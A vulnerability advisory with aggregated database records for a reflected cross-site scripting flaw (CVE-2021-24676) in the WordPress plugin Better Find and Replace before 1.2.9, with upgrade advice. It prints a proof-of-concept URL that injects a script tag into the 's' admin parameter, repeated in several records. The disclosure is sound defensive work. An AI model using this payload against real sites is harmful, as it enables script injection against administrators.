Description
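The plugin does not escape the 's' GET parameter before outputting it back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting (XSS) issue. The issue is tracked as CVE-2021-24676 (CWE-79) and affects Better Find and Replace versions before 1.2.9; update the plugin to at least 1.2.9.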
### PoC
`https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=<script>alert(/XSS/)</script>`
Affected Software
Related
{"id": "WPVDB-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "Better Find and Replace < 1.2.9 - Reflected Cross-Site Scripting", "description": "The plugin does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n\nhttps://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s;=\n", "published": "2021-09-06T00:00:00", "modified": "2021-09-06T09:17:06", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://wpscan.com/vulnerability/59589e74-f901-4f4d-81de-26ad19d1b7fd", "reporter": "apple502j", "references": [], "cvelist": ["CVE-2021-24676"], "immutableFields": [], "lastseen": "2021-11-26T19:14:05", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24676"]}, {"type": "patchstack", "idList": ["PATCHSTACK:9429B58D1FEBCFBC19DF4A85DCC9EFFF"]}, {"type": "wpexploit", "idList": 
["WPEX-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24676"]}, {"type": "wpexploit", "idList": ["WPEX-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "real-time-auto-find-and-replace", "version": 1}]}, "vulnersScore": 0.2}, "affectedSoftware": [{"version": "1.2.9", "operator": "lt", "name": "real-time-auto-find-and-replace"}], "exploit": "https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=<script>alert(/XSS/)</script>", "sourceData": "", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007483, "affected_software_major_version": 1666691171}, "_internal": {"score_hash": "bedc60d1cc67eabceffdb926d06de10a"}}
{"cnvd": [{"lastseen": "2022-11-05T07:17:51", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports the hosting of personal blog sites on PHP and MySQL servers. WordPress plugin is a WordPress open source application plugin. WordPress Better Find and Replace plugin has a cross-site scripting vulnerability, which stems from the lack of proper validation of client-side data by the WEB application. An attacker could exploit the vulnerability to execute client-side code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-10-09T00:00:00", "type": "cnvd", "title": "WordPress Better Find and Replace plugin cross-site scripting vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2022-01-07T00:00:00", "id": "CNVD-2022-01700", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-01700", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:30:37", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by apple502j 
in WordPress Better Find and Replace plugin (versions <= 1.2.8).\n\n## Solution\n\n\r\n Update the WordPress Better Find and Replace plugin to the latest available version (at least 1.2.9).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-06T00:00:00", "type": "patchstack", "title": "WordPress Better Find and Replace plugin <= 1.2.8 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2021-09-06T00:00:00", "id": "PATCHSTACK:9429B58D1FEBCFBC19DF4A85DCC9EFFF", "href": "https://patchstack.com/database/vulnerability/real-time-auto-find-and-replace/wordpress-better-find-and-replace-plugin-1-2-8-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T15:01:11", "description": "The Better Find and Replace WordPress plugin before 1.2.9 does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 
{"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-10-04T12:15:00", "type": "cve", "title": "CVE-2021-24676", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2021-10-08T17:59:00", "cpe": [], "id": "CVE-2021-24676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24676", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-11-26T19:14:05", "description": "The plugin does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-09-06T00:00:00", "type": "wpexploit", "title": "Better Find and Replace < 1.2.9 - Reflected 
Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2021-09-06T09:17:06", "id": "WPEX-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD", "href": "", "sourceData": "https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=<script>alert(/XSS/)</script>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}